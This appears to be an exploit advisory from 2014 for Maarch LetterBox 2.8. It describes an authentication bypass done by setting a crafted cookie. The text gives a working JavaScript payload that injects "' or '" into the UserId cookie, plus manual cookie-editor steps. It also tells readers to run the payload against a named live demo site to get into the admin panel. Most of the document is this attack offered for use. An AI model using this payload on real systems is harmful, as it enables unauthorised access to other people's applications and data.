# Title : Maarch LetterBox 2.8 Insecure Cookie Handling Vulnerability (Login Bypass)
# Author : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com
# Home : http://milw00rm.com / its online
# Date : 17.11.2014
# Demo : http://www.era.sn/courrier
# Download : http://downloads.sourceforge.net/project/maarchletterbox/MaarchLetterBox2.8.zip
# Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
you first go here:
http://www.target.com/path/index.php?page=welcome.php
you will go login.php, but if we change our cookie's with this exploit we will be login admin panel.
exploit:
javascript:document.cookie = "UserId=[username] ' or '; path=/";
or you edit your cookie's with "Cookies Manager"
name = maarch
contents = UserId=username ' or '
host = your target
path = /script_path/
and dont change other options its keep default.
for demo:
javascript:document.cookie = "UserId=demo ' or '; path=/";
or with Cookies Manager (demo has 2 user demo and demo2 you can test for 2 user)
name = maarch
contents = UserId=demo ' or ' / for other users UserId=demo2 ' or '
host = www.era.sn
path = /
and save it after go here:
http://www.era.sn/courrier/index.php?page=welcome.php